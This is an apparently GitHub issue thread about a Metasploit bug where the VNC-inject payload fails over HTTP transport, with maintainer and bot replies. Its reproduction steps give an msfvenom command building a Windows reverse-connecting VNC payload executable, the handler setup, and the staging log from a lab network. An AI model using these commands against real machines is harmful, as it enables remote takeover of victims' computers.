Open eddieharari opened 6 years ago
VNC doesn't support HTTP as a transport. Try using reverse_tcp instead. Just checked, it works fine using Tiger VNC as the vncviewer application.
Noted above, it seems like around 2015 the code that prevents this payload combination from appearing in the list stopped blocking it. Still trying to work out what's wrong :/
Hi!
This issue has been left open with no activity for a while now.
We get a lot of issues, so we currently close issues after 60 days of inactivity. It’s been at least 30 days since the last update here. If we missed this issue or if you want to keep it open, please reply here. You can also add the label "not stale" to keep this issue open!
As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.
Steps to reproduce
msfvenom -p windows/x64/vncinject/reverse_winhttp -f exe lhost=192.168.2.115 > /mnt/vnchttp64.exe
msfconsole
use exploit/multi/handler
set payload windows/x64/vncinject/reverse_http
set lhost "IP OF METASPLOIT machine"
Running the vnchttp.exe on a Windows 2012 machine with connectivity to the Metasploit machine
Here are the results:
msf exploit(handler) >
[*] http://192.168.2.115:8080 handling request from 192.168.2.114; (UUID: qwcvrevo) Staging x64 payload (475136 bytes) ...
[*] http://192.168.2.115:8080 handling request from 192.168.2.114; (UUID: qwcvrevo) Starting local TCP relay on 127.0.0.1:5900...
[*] http://192.168.2.115:8080 handling request from 192.168.2.114; (UUID: qwcvrevo) Local TCP relay started.
[*] http://192.168.2.115:8080 handling request from 192.168.2.114; (UUID: qwcvrevo) Launched vncviewer.
[*] VNC connection closed.
/usr/bin/vncviewer: VNC server closed connection
What should happen? VNC session should be open.
What happens instead? VNC session always breaks because of a server error.
Metasploit version
Framework: 4.16.2-dev
Console : 4.16.2-dev
I installed Metasploit with: